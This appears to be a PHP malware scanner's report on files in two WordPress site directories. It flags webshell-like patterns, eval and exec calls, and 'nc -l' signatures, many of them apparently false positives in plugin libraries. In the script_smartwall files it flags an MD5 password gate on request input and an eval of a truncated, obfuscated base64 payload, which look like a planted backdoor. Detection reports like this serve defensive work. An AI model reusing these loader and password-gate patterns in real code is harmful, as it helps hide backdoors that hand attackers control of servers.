| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/saratov/data/www/intim-saratov.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-10-01 18:33:55 Modified: 2020-10-01 18:33:55 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/saratov/data/www/intim-saratov.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-10-01 18:33:55 Modified: 2020-10-01 18:33:55 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/saratov/data/www/intim-saratov.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-10-01 18:33:55 Modified: 2020-10-01 18:33:55 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:36:40 Modified: 2020-07-24 20:07:21 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-09-27 12:59:22 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-03-20 21:29:19 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.98 kB Created: 2020-03-20 21:29:23 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7580 Dangerous Hacker credits |
Hacked by
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-03-20 21:29:31 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-03-20 21:32:09 Modified: 2020-07-24 20:07:21 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-03-20 21:29:32 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-03-20 21:27:28 Modified: 2020-07-24 20:07:21 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-03-20 21:27:34 Modified: 2020-07-24 20:07:21 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-03-20 21:27:16 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-09-13 20:56:45 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-09-13 20:56:46 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-09-13 20:56:46 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-09-13 20:57:19 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-09-13 20:57:13 Modified: 2020-07-24 20:07:21 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-09-13 20:55:02 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-09-13 20:56:39 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-09-13 20:56:40 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-09-13 20:56:39 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/pern/data/www/intim-perm.club/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 18:25:10 Modified: 2020-09-27 18:25:23 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
